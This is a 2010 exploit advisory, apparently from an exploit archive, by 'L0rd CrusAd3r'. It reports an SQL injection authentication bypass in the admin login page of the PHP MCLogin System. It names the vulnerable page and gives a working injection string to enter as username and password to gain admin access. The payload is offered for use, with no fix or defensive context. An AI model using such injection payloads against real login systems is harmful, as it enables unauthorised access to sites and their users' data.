Authentication Bypass in Home of MCLogin System

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Authentication Bypass in Home of MCLogin System
# Published : 2010-06-08
# Author : L0rd CrusAd3r
# Previous Title : Joomla Component com_g2bridge LFI vulnerability
# Next Title : CafeEngine CMS V2.3 SQLI Vulnerability

Author: L0rd CrusAd3r
Published: 2010-06-08
Vendor url:-/www.maniacomputer.com
################################################################################################

Authentication Bypass in Home of MCLogin System
1,1
######################################Author:L0rd
CrusAd3r######################################

Description:-

With MCLogin System your visitors can login or register a new account. It is
written in PHP and the data is stored in a MySql database.Very easy to
install or to customize to meet your needs. You can add it to your pages
with just one link.

###################################################################################################

Vulnerability:-

*Authentication Bypass found

The Provided Script as Sqli Vulnerability in Admin Login page

DEMO : http://server/login/login_index.php

Use the string a' or '1'='1 for Username and Password to gain access.

######################################################################################################


Greetz to:MaYur,Sid3^effects

-- 
With R3gards,
L0rd ?rusAdêr